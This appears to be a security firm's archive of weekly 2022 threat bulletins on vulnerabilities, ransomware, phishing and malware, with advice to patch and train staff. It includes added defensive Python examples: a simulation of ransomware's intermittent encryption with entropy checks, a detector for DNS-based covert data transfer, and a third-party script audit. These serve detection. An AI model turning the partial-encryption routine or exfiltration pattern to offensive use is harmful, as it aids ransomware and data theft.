Another way malware is currently being spread is through the mouseover feature in PowerPoint files. The presentation appears to come from the Organisation for Economic Co-operation and Development (OECD, or in Dutch OESO) and consists of two slides explaining the use of the interpretation function in Zoom. The malware is activated when the victim opens the infected presentation in presentation mode and then moves the mouse over the hyperlink, so no further action or click by the user is required. Here, too, we see cybercriminals reusing a pre-existing, older technique. We currently see this method used widely in attacks on defense companies and government agencies, among others.

#WakeUpWednesday October 19, 2022

Phishing remains an important method for cybercriminals to capture user data. Caffeine is a new “Phishing-as-a-Service” platform where users can create their own campaign. Because this platform has an open registration process, essentially anyone with an e-mail address can register. Currently, ads for Caffeine are running on various forums. Make sure employees are regularly trained on how to recognize phishing emails, know where to report a phishing attempt and are aware of their online behavior.

Last week, a proof of concept exploit was published for the Fortinet Authentication Bypass. We recommend that vulnerable systems be updated as soon as possible. If that is not possible, we recommend applying the workaround.

It has since been revealed that nearly 900 servers have been compromised through the vulnerability in Zimbra Collaboration Suite. Last week, a proof of concept (PoC) was added to the Metasploit framework, making it possible to exploit the vulnerability without in-depth knowledge of the matter. Zimbra has since released a fix in ZCS version 9.0.0 P27, which replaces the vulnerable cpio component with pax and removes the weak component that enabled exploitation.

Cybercriminals from the relatively new ransomware group Venus are currently actively using Remote Desktop Services to encrypt Windows systems. We never recommend making Remote Desktop services available directly on the Internet. Preferably place these remote worker services behind a VPN solution (with MFA).

On October 13, 2022, a vulnerability in the Apache Commons Text library was announced on the Apache dev list. The vulnerability (CVE-2022-42889) bears similarities to Apache Log4j (Log4Shell), but its attack surface is more limited: only applications that pass attacker-controlled input through the library's string interpolation are affected.

#WakeUpWednesday October 12, 2022

Within cybersecurity, we regularly see older techniques being revamped and reintroduced as new variants. One of these is fileless malware, a technique in which the malicious code lives only in memory and runs inside legitimate built-in processes of, for example, Windows. Because regular, legitimate processes are used and nothing is written to disk, this form of malware is much more difficult to detect.

Furthermore, we see cybercriminals using social engineering more intensively and trying to capture user data in various ways. Within retail and hospitality, credential harvesting and phishing are currently the main ways of victimization. In addition, more than 400 apps have recently been found in the Play Store and the App Store aimed at stealing Facebook users’ login credentials. We recommend using your own unique password for each app, application or account that requires logging in and not reusing passwords. A password vault can help here.

The blog around ProxyNotShell is regularly updated with new information regarding mitigating measures.

Information has also recently been published about Maggie malware. This malware has already infected many Microsoft SQL servers worldwide with a backdoor. Maggie works with simple TCP redirect functionality, allowing cybercriminals to remotely connect to any IP address that can reach the infected SQL server.

#WakeUpWednesday October 5, 2022

Last week, a critical vulnerability was reported in Microsoft Exchange called ProxyNotShell. In our blog, you will find the latest information regarding this vulnerability and the measures you can take to reduce the chance of exploitation.

Furthermore, we see that cybercriminals are also paying attention to the industrial and healthcare sectors. For example, analysis from Outpost24 shows that a group called Shathak, has been actively launching attacks against healthcare, financial and manufacturing organizations since 2019. Medtronic warns of a vulnerability in Medtronic’s 600-series MiniMed insulin pumps.

A new campaign has also been launched by cybercriminals involving backdoor malware hidden in an image of the Windows logo. By using steganography, the malicious code remains hidden from antivirus software. The attack initially exploits existing vulnerabilities such as Microsoft Exchange ProxyShell and ProxyLogon; then the backdoor hidden in the Windows logo is installed.

#WakeUpWednesday September 28, 2022

Cybercriminals use existing software vulnerabilities and stolen user data, among other things, to gain access to organizations. Currently, a zero-day vulnerability in Sophos firewall is being exploited by cybercriminals. The vulnerability allows them to execute arbitrary code on the underlying system. Meanwhile, a patch is available; the advice is to install it as soon as possible. In addition, the advice is to ensure that the User Portal and Webadmin are not accessible from the Internet.

Furthermore, cybercriminals are currently abusing poorly secured administrator accounts to register rogue OAuth applications. With the OAuth application registered in the tenant, they maintain access even if the administrator password is changed. Cybercriminals then use this access to send spam through these organizations' Exchange servers. We recommend not reusing passwords and, of course, turning on multifactor authentication for accounts that do not already have it set up.

Also via GitHub, users are enticed to leave their credentials on a counterfeit login page. In this case, the message claims that the CircleCI session has expired and that the user needs to log in again via a link. Another way used is an email saying that CircleCI has changed the Terms of Use and Privacy Policy and that it must be re-accepted via an attached link.

In addition, we are seeing developments where domain shadowing is gaining popularity among cybercriminals. In this method, a legitimate DNS domain is compromised to host sub-domains of the cybercriminal for malicious activities. In the process, the existing legitimate DNS entry is not changed, so the owner is often unaware that the domain has been compromised.

Finally, in the area of ransomware, we are also seeing changes in tactics. To enforce the ransom demand, there are multiple techniques. These range from threatening to publish captured data to targeting individuals or organizations that appear in the set of data or performing, for example, a DDoS attack to make recovery difficult. A new method seems to be holding data hostage and threatening to destroy the data if payment is not made.

#WakeUpWednesday September 21, 2022

Since the beginning of this month, patches have been released by a large number of vendors. The latest patch Tuesday from Microsoft provided updates for several critical vulnerabilities. Updates have also become available for Gitlab, Google Chrome, Adobe, Android, Citrix, Dell and Cisco, for example. Installing updates is one of the essential measures to keep cybercriminals out.

Recently, about 280,000 WordPress sites were attacked by a zero-day vulnerability in the WPGateway plugin. By exploiting this vulnerability, cybercriminals can gain complete control over the website. No update is available yet, users are advised to uninstall the plugin until the issue is resolved.

Furthermore, a warning to be alert for attacks with ChromeLoader malware. This malware steals passwords and personal information and can also install additional malware, including ransomware. ChromeLoader is spread through rogue links in YouTube, Twitter comments and rogue advertisements.

There is currently a trend in the gamer community whereby gamers are being targeted via YouTube videos with links offering cheats and cracks for a number of popular games. Downloading the rar files causes malware, RedLine stealer, to be installed. In addition, it provides access to the victim’s YouTube account in order to further spread the malware through that account. Being aware of what is being downloaded and installed is therefore essential.

#WakeUpWednesday September 14, 2022

In addition to new ransomware variants, ransomware operators are also changing their encryption method. Instead of encrypting a file fully, only parts of it are encrypted (intermittent encryption). The file is still unusable, but the time needed to encrypt it becomes much shorter, and whole-file heuristics such as a sudden rise in file entropy become less reliable. The Agenda ransomware offers several options for how files are partially encrypted.
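The added example below (not code from the original post or from any ransomware family) shows why this matters for detection. It simulates intermittent encryption by overwriting every tenth 4 KiB block of a constructed text file with random bytes (a stand-in for ciphertext, not a real cipher), and then compares whole-file Shannon entropy with per-block entropy: the whole-file value stays low enough to pass an "encrypted file" threshold, while the per-block view exposes the high-entropy islands.

```python
import math
import os
from collections import Counter

BLOCK = 4096


def shannon_entropy(data):
    """Bits per byte; plain text is typically 4-5, ciphertext or compressed data close to 8."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def intermittent_encrypt(data, block=BLOCK, every=10):
    """Simulate partial encryption: every `every`-th block is replaced with random bytes.
    os.urandom stands in for ciphertext here; this is a simulation, not an encryptor."""
    out = bytearray(data)
    for i in range(0, len(out), block):
        if (i // block) % every == 0:
            out[i:i + block] = os.urandom(min(block, len(out) - i))
    return bytes(out)


def block_entropies(data, block=BLOCK):
    return [shannon_entropy(data[i:i + block]) for i in range(0, len(data), block)]


def whole_file_looks_encrypted(data, threshold=7.0):
    """The naive heuristic: flag only when the entire file is high-entropy."""
    return shannon_entropy(data) >= threshold


def looks_partially_encrypted(data, block=BLOCK, high=7.5, low=6.0):
    """Per-block heuristic: high-entropy blocks interleaved with low-entropy ones."""
    ents = block_entropies(data, block)
    return max(ents) >= high and min(ents) <= low


# Constructed sample input: ~430 KiB of repetitive report text.
SAMPLE = b"Quarterly report: revenue grew 12 percent; see appendix B for details.\n" * 6000
PARTIAL = intermittent_encrypt(SAMPLE)

if __name__ == "__main__":
    for label, blob in (("original", SAMPLE), ("intermittently encrypted", PARTIAL)):
        print(label, "whole-file entropy %.2f" % shannon_entropy(blob),
              "whole-file flag:", whole_file_looks_encrypted(blob),
              "per-block flag:", looks_partially_encrypted(blob))
```

Per-block entropy is only one signal (compressed archives and media files also contain high-entropy blocks), so in practice it is combined with write-pattern telemetry such as the rate of rewritten files and new file extensions, but it restores visibility that a whole-file check loses once only a fraction of each file is touched.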

The Lampion malware is currently being spread through phishing campaigns using WeTransfer. Be aware of the sender of any request and be alert when downloading documents, even if they are sent via WeTransfer.

Operational technology is increasingly being targeted by cybercriminals, and equipment that is exposed to the Internet becomes vulnerable. In that context, several vulnerabilities have been found in medical equipment used to administer medication or nutrition to patients. Measures such as shielding the network with a firewall, network segmentation and timely patching are necessary for OT equipment too!

#WakeUpWednesday September 7, 2022

Malware is spread in very creative ways. For example, a photograph taken by the James Webb Telescope is used as a lure in a Golang-based malware campaign.
Phishing emails with a Microsoft Office attachment act as the entry point to the attack chain. If the attachment is opened, it retrieves a hidden VBA macro, which in turn is automatically executed if the recipient enables macros.

Go seems to be growing in popularity among cybercriminals because it compiles a single code base into native binaries for different operating systems. This allows cybercriminals to attack Windows, Linux and macOS from one common code base. Be aware of the sender of the mail and the attachment, and be careful about enabling macros.

Another new malware written in Go is the BianLian ransomware. This ransomware was first seen in mid-July. The cybercriminals behind this ransomware claim that 15 organizations have now been victimized. By the way, BianLian is separate from the banking trojan of the same name!

Furthermore, a new ransomware strain written in Golang has been discovered. This ransomware, called Agenda, targets healthcare and educational institutions in Indonesia, Saudi Arabia, South Africa and Thailand. A characteristic of Agenda is that it can reboot systems in safe mode and has multiple modes to run.

Finally, QNAP is urging users of its Photo Station software to update their NAS device immediately. The reason is that a vulnerability in this software is being exploited by cybercriminals behind the Deadbolt ransomware.

Make sure you know what systems and applications are being used within your organization and install updates as soon as possible. Further, make sure your employees are aware of the importance of updating. Not only for their business devices, but with the intertwining of business and private, also the private environment.

#WakeUpWednesday August 31, 2022

Critical vulnerabilities still allow cybercriminals to gain access to systems and data. Alternatively, these vulnerabilities can be exploited by cybercriminals to increase their privileges within your systems.

Last Friday, the CISA (U.S. Cybersecurity and Infrastructure Security Agency ) added ten new, actively exploited vulnerabilities, to its list. These vulnerabilities include: CVE-2022-26352 – dotCMS Unrestricted Upload of File Vulnerability, CVE-2022-24706 – Apache CouchDB Insecure Default Initialization of Resource Vulnerability, CVE-2022-24112 – Apache APISIX Authentication Bypass Vulnerability and CVE-2022-22963 – VMware Tanzu Spring Cloud Function Remote Code Execution Vulnerability.

In addition, a critical vulnerability was discovered in Atlassian Bitbucket Server and Atlassian Data Center. More information on versions and updates is available on the Atlassian Confluence website.

Furthermore, a detailed blog has been published regarding two vulnerabilities in WatchGuard Firebox and XTM appliances, CVE-2022-31789 and CVE-2022-31790. Software patches for both vulnerabilities were published by WatchGuard in June 2022. The vulnerabilities and associated software patches are discussed in more detail in the following security advisories from the manufacturer:

The blog contains sufficient detail to exploit the software vulnerabilities. Therefore, the advice is to apply the software patches as soon as possible.

Finally, Lockbit, a ransomware group, has announced that it will use triple extortion. This hardens the battle between attackers and victims. If the ransom for the hostage data is not paid, the threat is not only to publish the data, but also to carry out a DDoS attack on the already affected organization. This puts even more pressure on the victims to pay up.

#WakeUpWednesday August 24, 2022

Updating systems and applications remains important to keep cybercriminals out. Apple has released an update to fix two actively attacked zero-day leaks that allow attackers to gain full control of a system. If possible, the advice is to install the updates as soon as possible.

Research shows that more than 80,000 Hikvision cameras are still vulnerable. An update to fix this vulnerability was released almost a year ago. Thousands of systems, in use by some 2,300 organizations in more than 100 countries, still appear to be vulnerable.

If your organization is hit by a ransomware attack, the first priority is to repel it and limit the damage as much as possible. In doing so, it is important not only to take measures to prevent a new attack from the outside, but also to investigate whether there may be traces of other attackers. In this case, an organization was hit by three different groups in the space of two weeks.

#WakeUpWednesday August 17, 2022

In recent weeks there have been many reports of ransomware attacks in the media. Artis, home shopping chain Casa, dental chain Colosseum Dental Benelux, supermarket chain 7-Eleven and the British water company South Staffordshire Water: these days every organization that has data is interesting for cybercriminals. In the case of the water company, the attackers claim to have far-reaching control over the systems that allow them to alter the chemical composition of the water.

We also see a lot of activity on the development side. BlueSky Ransomware is an emerging family that uses various techniques to circumvent security measures. BlueSky targets Windows systems and uses “multithreading” to encrypt files even faster. Therefore, make sure that you have basic measures arranged such as network segmentation, creating and being able to restore backups and installing available updates.

In addition, new functionality has been added to the SOVA malware to encrypt Android devices. The SOVA malware targets more than 200 apps for banking, crypto trading and digital wallets, stealing user data and cookies.

Furthermore, Palo Alto has issued an alert regarding a critical vulnerability, CVE-2022-0028, in its PAN-OS that is currently being exploited. This is a software flaw that is reachable through a specific misconfiguration. It allows an attacker to use the firewall to carry out a reflected DoS attack against another target on the Internet.

Finally, VMware has published an advisory regarding a number of vulnerabilities. By combining two of these vulnerabilities, there is a chance of an unauthenticated remote code execution. Patches are available, the advice is to install them as soon as possible.

#WakeUpWednesday July 20, 2022

All devices connected to the Internet are vulnerable to an attack by cybercriminals. This includes VoIP servers and phones. Elastix VoIP phone servers and VoIP phones that use Digium software are vulnerable to a campaign designed to exfiltrate data by downloading and executing scripts or malware that allows cybercriminals to gain control over (parts of) the system.

Besides servers, cell phones and PCs, PLCs (Programmable Logic Controllers) and HMIs (Human Machine Interface) are also vulnerable to Sality malware. Cybercriminals have managed to infect these industrial control systems. Sality creates a peer-to-peer botnet for password cracking and cryptocurrency mining, for example.

Furthermore, there is a phishing campaign kit active targeting PayPal users that attempts to steal from users a large set of personal information. This kit is hosted through legitimate WordPress websites that have been hacked.

In addition, there is a large-scale attack on WordPress sites using the Kaswara Modern WPBakery Page Builder Add-on. This contains security vulnerability CVE-2021-24284 that allows unauthenticated attackers to upload malicious PHP files to gain control of the website. As there is no security update available and the add-on is now no longer offered, the advice is to remove this plug-in.

In all cases, it is important to use multifactor authentication and good network segmentation as much as possible.

#WakeUpWednesday July 13, 2022

The malware delivery methods that usually come to mind are attachments in email, updates from outside the official stores, or visits to dubious websites. PennyWise is malware that poses as a Bitcoin mining application promoted on YouTube. While watching the YouTube video, viewers are persuaded to download a supposedly safe file. However, that file does not contain the Bitcoin software but the PennyWise malware. Therefore, be alert when it comes to downloading and installing software and only use the regular stores.

Updating software remains essential. Microsoft released new patches for 84 vulnerabilities last Tuesday, including for a critical vulnerability (CVE-2022-2294), which is currently being actively exploited.

Furthermore, a new phishing campaign has been spotted that takes advantage of the attention to the recently published Follina vulnerability. This campaign is used to spread Rozena malware. The starting point for this attack chain, observed by Fortinet, is an infected Office document that, when opened, connects to a Discord CDN URL to retrieve an HTML file (“index.htm”). This HTML file in turn invokes the diagnostic utility using a PowerShell command after which the next step in the attack chain is taken. Therefore, make sure your people are aware of the type of emails they receive and which attachments they open.

#WakeUpWednesday July 6, 2022

A new type of ransomware called Session Manager is currently active. This rogue session manager is disguised as a module for Internet Information Services (IIS) and exploits one of the ProxyLogon flaws in Microsoft Exchange servers. The use of this backdoor and the fact that this ransomware is so far poorly detected by virus scanners enable cybercriminals to operate undisturbed. Updating systems and setting up multi-factor authentication are important to keep cybercriminals out.

In addition, the FBI is warning about the MedusaLocker ransomware. This ransomware is brought into organizations by cybercriminals through vulnerable RDP connections and by employees opening infected email attachments. Some measures you can take right now to reduce the risk: disable unused ports, make sure systems are updated as soon as possible and make sure employees are alert to phishing messages.

The latest research data from WatchGuard Threat Lab shows that the number of ransomware detections in the first quarter of 2022 is double the total reported volume in 2021. Therefore, make sure your organization has basic cyber hygiene in place and is prepared for a cyber incident.

The annual Cybersecurity Beeld Nederland (CSBN), drawn up in collaboration with the National Cyber Security Centre (NCSC), shows that the digital resilience of many organizations in the Netherlands is still insufficient. Making and testing backups or introducing multi-factor authentication are basic measures that have not yet been adequately implemented in every organisation.

#WakeUpWednesday June 29, 2022

The developments within cybersecurity are moving at lightning speed. Cybercriminals are constantly inventing new ways to penetrate organizations. All equipment with a link to the Internet is vulnerable, including cameras, climate control systems and systems for Internet telephony. Recently, a zero-day vulnerability in a Mitel VoIP server was used to carry out a ransomware attack. A software update for the vulnerability is available. The advice is to update these systems as soon as possible.

Another development is the use of a malware tool that allows cybercriminals to build rogue Windows shortcut (.LNK) files. This tool, Quantum Lnk Builder, allows spoofing of a large number of extensions and offers various possibilities for infecting systems. Quantum Lnk Builder is believed to be affiliated with Lazarus, however, Bumblebee and Emotet also seem to be using .LNK files more and more when attempting to infect a system.

It is important that everyone in the organization knows how to deal with potential phishing emails. A new method is by approaching organizations with an email claiming that the organization is infringing on copyright. In one case, a zip file is sent along with what appears to be a pdf. In practice, however, the file turns out to install ransomware. In the other case, a link is sent along that spreads malware.

Now that multi-factor authentication (MFA) is becoming commonplace in more and more organizations, it is becoming more difficult for cybercriminals to log in with stolen user data. By abusing WebView2 apps and stealing the authentication cookies of the intended victim, cybercriminals still try to bypass MFA. MFA is a good way to create a barrier and make accounts extra secure; however, it also requires users to pay attention when using it.

In a number of cases, a ransomware attack skips the ‘encryption’ step and focuses mainly on stealing information and the threat of publishing it. Be prepared and make sure you have implemented at least the basic measures.

#WakeUpWednesday June 22, 2022

Installing updates is one way to fix vulnerabilities as quickly as possible. This is especially true for vulnerabilities in operating systems. A vulnerability in FreeBSD systems allows cybercriminals to completely take over systems via wifi. An update for this vulnerability is available. The advice is to install this update as soon as possible.

For an actively exploited vulnerability in Ninja forms, a WordPress plugin for contact forms, an update is being forced by WordPress to fix this vulnerability. Cybercriminals could execute arbitrary code on the website or delete arbitrary files via the vulnerability.

Further, the advice is to install the security updates for Citrix Application Delivery Management. These updates fix a problem where cybercriminals could reset admin passwords. This affects all supported versions of Citrix ADM server and Citrix ADM agent (for example, Citrix ADM 13.0 before 13.0-85.19 and Citrix ADM 13.1 before 13.1-21.53).

Finally, Microsoft sees that the BlackCat Ransomware group is still attacking Microsoft Exchange systems that have not yet been updated. According to FBI figures, at least 60 organizations have been victimized between November 2021 and March 2022. Updating systems is an essential step in keeping cybercriminals out.

#WakeUpWednesday June 15, 2022

Many organizations use IT suppliers to a greater or lesser extent, for example to supply software. IT suppliers are thus connected to a large number of different organizations. These connections make these suppliers increasingly popular targets for cybercriminals. To illustrate, in 2021 there were 28 reports of data breaches at IT suppliers, resulting in 18,000 reports from organizations doing business with these IT suppliers. Our overview of basic measures ("basics in place") provides some tools to improve cybersecurity within your organization. Also ask your IT vendor how they handle data and what measures they have in place to reduce the risk of a cyber incident.

The United States Cybersecurity and Infrastructure Security Agency (CISA) has added 36 new vulnerabilities to its overall list. These 36 vulnerabilities are currently being actively exploited and are located in software and systems from Cisco, Netgear, Adobe and Microsoft, among others. We recommend checking whether your systems are vulnerable and updating them as soon as possible.

Several vulnerabilities have also been found in the A8Z3 thermal imaging camera that allow the device to be taken over by cybercriminals. Several vulnerabilities have also been discovered in the LenelS2 HID Mercury access control system that, for example, allow remote unlocking and locking of doors.

Furthermore, researchers have discovered new Linux malware, Symbiote. This malware infects all running processes on compromised systems, stealing user data and giving cybercriminals access. The malware is difficult to trace, however by monitoring anomalous DNS requests this malware could be discovered.
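The paragraph above notes that Symbiote can be spotted by monitoring anomalous DNS requests. As an added example (not from the original post and not Symbiote's published indicators, which this page does not list), the script below applies generic DNS anomaly heuristics to a constructed query log: unusually long labels, high-entropy labels and a single client issuing many unique subdomains under one domain. The log lines, the client addresses and the `updates.invalid` domain are all constructed; the "last two labels" rule for the registrable domain is a simplifying assumption (a real deployment would use a public-suffix list).

```python
"""Flag DNS queries whose shape suggests covert data transfer.

Added example with generic heuristics; all sample data is constructed.
"""
import hashlib
import math
from collections import Counter, defaultdict


def build_sample_log():
    """Constructed DNS log, one '<timestamp> <client> <queried name>' per line."""
    lines = [
        "2022-06-10T09:00:00 10.0.0.5 www.example.com",
        "2022-06-10T09:00:01 10.0.0.5 mail.example.com",
        "2022-06-10T09:00:02 10.0.0.9 cdn.example.net",
    ]
    # One host issues a burst of queries whose leftmost label is a long
    # pseudo-random string. The labels are derived from sha256 so the
    # sample is deterministic; 'updates.invalid' is a placeholder domain.
    for i in range(30):
        label = hashlib.sha256(f"chunk{i}".encode()).hexdigest()[:40]
        lines.append(f"2022-06-10T09:01:{i:02d} 10.0.0.7 {label}.updates.invalid")
    return "\n".join(lines)


def shannon_entropy(text):
    """Bits per character; 0.0 for empty or single-symbol strings."""
    if not text:
        return 0.0
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_dns_log(text):
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, name = line.split()
        rows.append((ts, client, name.lower().rstrip(".")))
    return rows


def split_name(name):
    """Return (subdomain, registrable domain). Assumption: the registrable
    domain is the last two labels; replace with a public-suffix lookup."""
    labels = name.split(".")
    if len(labels) <= 2:
        return "", name
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def find_anomalous_dns(rows, max_label_len=32, min_entropy=3.8,
                       max_unique_subdomains=20):
    """Return (per-query findings, per client/domain volume findings)."""
    per_query = []
    subdomains = defaultdict(set)
    for ts, client, name in rows:
        sub, domain = split_name(name)
        if sub:
            subdomains[(client, domain)].add(sub)
        longest = max(len(label) for label in name.split("."))
        entropy = shannon_entropy(sub.replace(".", ""))
        reasons = []
        if longest > max_label_len:
            reasons.append("long_label")
        if entropy >= min_entropy:
            reasons.append("high_entropy")
        if reasons:
            per_query.append({"time": ts, "client": client,
                              "name": name, "reasons": reasons})
    # Many distinct subdomains from one client to one domain is the
    # volume signature of data being carried in query names.
    per_pair = [
        {"client": c, "domain": d, "unique_subdomains": len(s)}
        for (c, d), s in subdomains.items() if len(s) > max_unique_subdomains
    ]
    return per_query, per_pair


if __name__ == "__main__":
    queries, pairs = find_anomalous_dns(parse_dns_log(build_sample_log()))
    for q in queries[:3]:
        print(q)
    for p in pairs:
        print(p)
```

The thresholds are starting points, not tuned values: legitimate CDNs, anti-virus lookups and certificate-transparency checks also produce long or high-entropy labels, so a practitioner would baseline per-domain behaviour first and allow-list known services before treating a hit as an incident.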

Finally, the Emotet banking trojan is once again causing a stir. This malware makes use of various Office attachments and in its renewed version is able to bypass the security scanners of email gateways. In addition, it steals credit card data. Therefore, make sure that users store login data and confidential information, such as credit card data, in a password safe, for example.

#WakeUpWednesday June 8, 2022

The developments in the field of cybercrime are moving fast. This makes it a great challenge for many organisations to keep up with all the (possible) threats. A new initiative to bundle this information and distribute it quickly is cyberteletext: teletext as we all know it, but with the latest vulnerabilities and the latest news on cyber security.

Last week a warning was issued for a vulnerability in Atlassian Confluence. Updates are available. The advice is to install them as soon as possible. If patching is not possible, Atlassian has described a number of additional mitigating measures.

Google has remedied several vulnerabilities in Android by making patches available. The vulnerabilities CVE-2022-20130 and CVE-2022-20127 allow remote code execution on Android phones. There are updates for Android 10, 11, 12 and 12L.

Recently, a new type of phishing campaign has been identified. Microsoft Word documents containing VBA macros are emailed as attachments. These macros then run shellcode contained in the document properties to install SVCReady malware. This malware can collect system information, take screenshots and download documents, among other things. It remains important to stay alert to phishing.

Cybersecurity companies from the US are warning against Chinese hackers. By exploiting vulnerabilities in telecom suppliers, they try to intercept and steal network traffic. They then try to obtain log-in data and use this to log in. Eventually, the attackers can forward the network traffic to their own infrastructure. The advice is to keep all systems up-to-date. A patch management system can help with this.

#WakeUpWednesday June 1, 2022

VMware has released security updates to address vulnerabilities in Workspace ONE Access, Identity Manager, vRealize Automation, Cloud foundation and vRealize Suite Lifecycle Manager. The vulnerabilities allow cyber criminals to gain administrator rights. A proof of concept is available for vulnerability CVE-2022-22972. The advice is to install the available security updates as soon as possible.

Microsoft also warns of a new vulnerability, CVE-2022-30190. To exploit this Microsoft Office RCE vulnerability (Follina), a cybercriminal needs a user to open a Word document. These documents are often shared by e-mail. Therefore the advice is, as with phishing, to make users aware of the risk of opening files from the mail when they come from an unknown sender or when the file is unexpected. A service update and an article with guidance are available, although at this moment there is no patch available yet.

The annual Verizon Data Breach Investigation Report (DBIR) shows that globally, web application attacks are increasingly responsible for cybersecurity incidents in healthcare. The healthcare sector is increasingly being attacked by cybercriminals and is also more often the victim of ransomware attacks. Most of the attacks have a financial motive, according to the report.

Ransomware groups are known for taking your files hostage. Recently we hear about a group that pretends to have other motives. RansomHouse is a ransomware group that uses a different business model, focusing primarily on data exfiltration. The motivation for this group is that they want to use extortion to point out to organizations that they are not investing enough in the security of their data, networks and systems or that they are not respecting their bug bounty program. The group claims that after payment it will help the affected organization to protect itself against future attacks. In addition, the affected organization receives a report describing which vulnerabilities were used and how they were used to gain entry.

What many organizations do not realize, or insufficiently, is that by using third-party JavaScript they run an increased risk of being hit by a cybersecurity incident. Third-party scripts allow cybercriminals to introduce malicious code into an organization’s web environment. Many organizations use third-party code for, for example, forms, processing orders and payments or tracking visitor behavior. Be alert to the use of third-party code. Know which code is used and check whether this code is also actively maintained.
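The paragraph above advises knowing which third-party code a web environment loads. As an added example (not from the original post), the script below inventories the `<script src>` tags of a page, separates third-party hosts from first-party ones and reports which third-party scripts are loaded without a Subresource Integrity (`integrity`) attribute, so a changed or tampered file on the remote host would still be accepted by the browser. The HTML, the hostnames and the `sha384-PLACEHOLDER` digest are constructed sample input.

```python
"""Inventory external scripts on a page and flag third-party ones without SRI.

Added example; the page content and hostnames below are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed page: one first-party script, one inline script, three
# third-party scripts of which only the checkout script carries an
# integrity attribute (digest value is a placeholder, not a real hash).
SAMPLE_HTML = """
<html><head>
<script src="/static/app.js"></script>
<script>window.dataLayer = [];</script>
<script src="https://cdn.example-analytics.invalid/track.js"></script>
<script src="//static.thirdparty-cdn.invalid/lib.js"></script>
<script src="https://js.payments.invalid/v3/checkout.js"
        integrity="sha384-PLACEHOLDER" crossorigin="anonymous"></script>
</head><body></body></html>
"""


class ScriptCollector(HTMLParser):
    """Collect the attribute dict of every <script> start tag."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self.scripts.append(dict(attrs))


def inventory_scripts(html, first_party_hosts):
    """Return one record per external script.

    A script is third-party when its src resolves to a host that is not in
    first_party_hosts. Relative URLs have no host and count as first-party;
    protocol-relative URLs ('//host/path') are parsed like absolute ones.
    """
    parser = ScriptCollector()
    parser.feed(html)
    records = []
    for attrs in parser.scripts:
        src = attrs.get("src")
        if not src:
            continue  # inline script: no remote file to pin
        host = urlparse(src).hostname
        records.append({
            "src": src,
            "host": host,
            "third_party": host is not None and host not in first_party_hosts,
            "has_sri": bool(attrs.get("integrity")),
        })
    return records


def third_party_without_sri(records):
    """Scripts that a remote host could silently change without detection."""
    return [r["src"] for r in records if r["third_party"] and not r["has_sri"]]


if __name__ == "__main__":
    inv = inventory_scripts(SAMPLE_HTML, first_party_hosts={"www.example.com"})
    for r in inv:
        print(r)
    print("third-party scripts without SRI:", third_party_without_sri(inv))
```

SRI only works for files whose content does not change, so a frequently updated analytics tag cannot simply be pinned; that is exactly the category to put on the review list, together with the question of who maintains it and whether it is still needed.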

#WakeUpWednesday May 25, 2022

The 2022 SaaS Security Survey Report identifies the risks and dangers associated with the use of SaaS solutions. In particular, configuration errors are cited as the cause of cybersecurity incidents. One of the reasons for this is that several departments have access to the security settings, without the people being trained or having cybersecurity as their focus area.

Cisco warns of an actively attacked vulnerability in IOS XR router software, which allows attackers to access the Redis database and modify information there, write arbitrary files to the container file system, and retrieve information about the Redis database. An update is available, the advice is to install it as soon as possible.

Educational institutions with a WordPress website that use the Premium tool ‘School Management’ are currently vulnerable due to a backdoor in this plug-in. The plug-in provides educational institutions with capabilities such as scheduling distance education, attendance tracking, expense tracking, enrolling new students, and document management. The vulnerability allows cybercriminals to run arbitrary PHP code, can let them access or alter the website’s contents, elevate privileges and assume complete control of the site. An update is available (version 9.9.7), please update to the most recent version as soon as possible.

#WakeUpWednesday May 18, 2022

Last week a political agreement was reached on new European regulations in the field of cybersecurity, NIS 2. Important changes are that the regulations will also apply to medium-sized and large organizations and that the number of sectors that are considered critical has been expanded. Some aspects mentioned in NIS 2 are patching vulnerabilities, risk management measures and the period within which incidents must be reported to the authorities.

A critical vulnerability in Zyxel firewalls allows cybercriminals to execute arbitrary code remotely. This includes downloading malware or misusing other vulnerabilities to penetrate the network. The vulnerability applies to both firewalls and VPNs. We have now received the first signals that this vulnerability is also actively being used by cyber criminals. An update is available, our advice is to update this equipment as soon as possible.

The update advice also applies to SonicWall SMA1000 series 6200, 6210, 7200, 7210 and 8000 devices with firmware versions 12.4.0 and 12.4.1. Cybercriminals can access internal resources and send potential victims to rogue websites.

Linux and Solaris (Unix) systems are also under attack by cybercriminals. For example, malware called BPFdoor has recently been discovered, which has been targeting Linux and Solaris systems undetected for the past five years. The malware allows cybercriminals to remotely connect to a Linux shell to gain full access to an infected system. The malware has gone undetected for so long because the command & control connection is initiated from outside. A firewall offers no protection against this malware and the malware can respond to commands from any IP address. A set of technical indicators (Yara rules, hashes) is now available with which you can scan a Linux or Solaris system.

#WakeUpWednesday May 11, 2022

Cybercriminals are constantly developing new ways to spread malware. In addition, we now also see that cyber criminals don’t stick to one specific way when spreading. This flexibility, combined with an increasing freedom of choice, means that organizations must be constantly alert and avoid tunnel vision when implementing cybersecurity measures.

Mandiant has researched worldwide trends in cybersecurity incidents, such as ways to distribute malware, and published them in an annual report. They state, among other things, that we have all become better at detecting incidents more quickly. In response to our efforts, attackers will of course remain flexible. In 37% of cases, attackers still most often enter by exploiting a vulnerability. Phishing is a much less popular method, at only 11%. The statistics on supply-chain attacks are striking; last year's attack on Kaseya is a well-known example. These attacks are rapidly gaining popularity, at 17% compared to 1% the year before.

We continue to see that exploiting vulnerabilities is a common way for attackers to get in. It is therefore extremely important to ensure that the management of hardware and software within your organization is in order. That is, keeping a good record of what hardware and software is in use, and ensuring that it is kept up-to-date. Qualys can help you with this. By ensuring that timely action is taken on security updates, you reduce the attack surface within your organization.

There is also a warning about Raspberry Robin, where malware is spread via USB sticks. Make sure your employees are aware of the risks associated with using unknown external equipment.

#WakeUpWednesday May 4, 2022

The NSA and FBI, along with cybersecurity agencies from multiple countries, have compiled an overview of the key vulnerabilities exploited in 2021. Unfortunately, these vulnerabilities are still causing victims today. The overview includes Proxylogon and Log4Shell. In addition to these most commonly used vulnerabilities, new vulnerabilities are regularly added that pose a potential threat to your organization.

